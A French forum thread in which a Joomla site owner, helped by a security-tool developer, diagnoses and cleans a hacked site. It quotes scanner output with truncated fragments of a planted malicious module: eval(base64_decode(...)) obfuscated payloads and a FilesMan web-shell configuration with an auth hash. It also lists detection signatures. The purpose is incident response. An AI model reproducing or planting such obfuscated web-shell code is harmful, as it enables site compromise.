Re : Hébergement compromis, site bloqué

Voici une première analyse de ma sauvegarde la plus récente et sans doute contaminée (après installation en local et utilisation de aeSecure). Pour seulement les DANGER, voici les principales signatures :

c3lzdGVt
SQL injection
warrior
Brute force
recky
Zamboanga
mirc
ia_archiver
macedonian
c2U2NF9kZNNvZGU
RmlsZXNNYW4
ZGVjb2RI

Qu'en pensez-vous ? Que dois-je faire ?
Merci

Re : Hébergement compromis, site bloqué

Bonjour. AeSecure QuickScan propose un petit bouton "envoyer par e-mail" pour chaque fichier trouvé. Je te suggère de l'utiliser et de m'envoyer les fichiers afin que j'y jette un œil au cours des prochains jours. Je t'informerais si ce sont des virus. Bonne journée

Re : Hébergement compromis, site bloqué

Bonjour cavo789 et merci de ton aide,
J'avais 2 sauvegardes par Akeeba : l'un d'avril et l'autre de février 2016 (les 2 sauvegardes étaient enregistrées sur le FTP). En local, j'ai restauré les 2 et lancé ton script aeSecure. J'ai à peu près les mêmes messages avec les mêmes fichiers potentiellement dangereux. Pour les fichiers marqués "Danger", la dernière sauvegarde a en plus de celle de février les signatures suivantes :

c2U2NF9kZWNvZGU en position 89090
RmlsZXNNYW4 en position 729
ZGVjb2RI en position 88286

Entre ces 2 versions, j'avais mis à jour la dernière version de Joomla et des extensions...

Re : Hébergement compromis, site bloqué

Voici les 3 fichiers en question, qu'en pensez-vous ?

C:\Users\Fabien\Downloads\UwAmp\www\sauvegardes\Sa uvegardes_2016\2016_04\modules\mod_cmscore\mod_cms core.php(87.35K)(Date dernière modif. May 01 2016 15:31:53.)
dcf414c4a31bb64c56fb6ce86424ee3cDanger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virus
Signature : c2U2NF9kZWNvZGU

Trouvé en position 89090 du fichier; voici le contexte :
UW14UVUxSTBVak5rTUZSRlVqTmpSWGhUWlVSRmIwcElhRnBTV0 hCRlpGUmFlVTB3Vm1GV1EyczNJaWtwT3c9PSIpKTtldmFsKGJh c2U2NF9kZWNvZGUoIkpIaHpWbWxVVDJJMmFEUk9QU2NuTzJadm NpZ2tlR3gwVld4RFlqVkhlSE05TURza2VHeDBWV3hEWWpWSGVI TThKSGhpV0VGalI
Danger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virus
Signature : RmlsZXNNYW4

Trouvé en position 729 du fichier; voici le contexte :
auth_pass = "4a88316453a953e28c013105c50d123e";
$color = "#df5";
$default_action = base64_decode('RmlsZXNNYW4=');
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH17ejRn
Danger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virus
Signature : ZGVjb2Rl

Trouvé en position 88286 du fichier; voici le contexte :
MmIiciISYmJncmJiZxJiYmLSd2Mz0vGR5xYnV4NDwwZ3F9d3t4 fXp/PS8ZHhke";eval(base64_decode("ZXZhbChiYXNlNjRfZGVj b2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doaF RWZHdNbGRFV1RCT1Ixb3dVRmRLYUdNeVZUSk9SamxyV2xkT2Rs cEhW

Re : Hébergement compromis, site bloqué

Désolé pour mes questions un peu naïve mais lorsque je réinstalle en local mon site à partir d'une version sauvegardée, le site tourne normalement. S'il tourne... ces versions sont elles pour autant vérolées ?
Merci

Re : Hébergement compromis, site bloqué

Bonjour Terradoc

Zéro doute aucun au vu de ce que tu as posté ci-dessus; ton site est vérolé. mod_cmscore est un virus, rien qu'un virus. Un module bidon. Et l'autre fichier est un filesmanager; deux bestioles donc et, partant de là, nul doute que tu trouveras d'autres bestioles.

Cessons de tourner autour du pot comme on le fait depuis plusieurs jours :
1. ton site est vérolé
2. non, il n'est pas sain : il est contaminé.
3. tu vas devoir le nettoyer. Si tu ne sais pas comment le faire, voici un tuto https://www.aesecure.com/fr/blog/site-hacke.html
4. si tu restaures une version qui était vérolé (à toi de le confirmer); oui, le site restauré est vérolé lui aussi. Il te faut une version propre pour que le site soit propre. Comment en être sûre ? A ton niveau, tu ne sais pas avoir cette certitude. Passe-lui un coup d'aeSecure QuickScan pour voir si tu trouves des bestioles.

Bonne journée.

Re : Hébergement compromis, site bloqué

Merci encore de ton aide... Difficile de s'y retrouver quand on est novice et pris par la panique. Si je pouvais trouver une sauvegarde propre, ça serait bien sur plus simple.
Pour résumer et après un week-end passé à tenter de résoudre le problème :

Je dispose de 2 versions de sauvegarde :

- l'une de début avril 2016 : aucun doute, cette version est vérolée. J'ai pu également voir un compte administrateur + adresse mail nouvelle !

- l'une de février 2016 : bonne nouvelle, pas de compte administrateur, ni d'adresse nouvelle et les 3 signatures que j'ai décrit plus haut sont absentes ! Néanmoins, le scan aeSecure repère toujours des dizaines de signatures dont certaines présentes un "danger" :
c3lzdGVt
SQL injection
warrior
Brute force
recky
Zamboanga
mirc
ia_archiver
macedonian

Penses-tu qu'il s'agisse de fichiers contaminés ?

Re : Hébergement compromis, site bloqué

Nous tournons en rond Terradoc... A ce rythme nous atteindrons les 100 posts d'ici quelques jours.

Il serait temps de commencer à nettoyer ton site et/ou de partir sur ta précédente version mais de prendre une décision et de commencer ;-)

Bonne journée.

Re : Hébergement compromis, site bloqué

Bonjour cavo789,
Je poursuis mon ménage sur tes conseils. Plusieurs menaces ont été supprimées.
Que penses-tu de cette signature ia_archiver qui revient à plusieurs reprises avec aeSecure ?
Merci

'fido',
'geckobot',
'Gigabot',
'Girafabot',
'grub-client',
'Gulliver',
'HTTrack',
'ia_archiver',
'InfoSeek',
'kinjabot',
'KIT-Fireball',
'larbin',
'LEIA',
'lmspider',
'Lycos_Spider

Re : Hébergement compromis, site bloqué

Bonjour Bonsoir,
Merci à cavo789 et à son aesecure pour ses multiples conseils.
J'ai résolu 95% des signatures suspectes ou dangereuses de mon site en les supprimant ou en les remplaçant par les mêmes fichiers sains. Il me reste toutefois quelques signatures qui font référence à des fichiers components (com_users, com_weblinks, com_contentque) que je n'arrive pas à trouver sur une version saine et donc pas à remplacer...
Que faire ?
Merci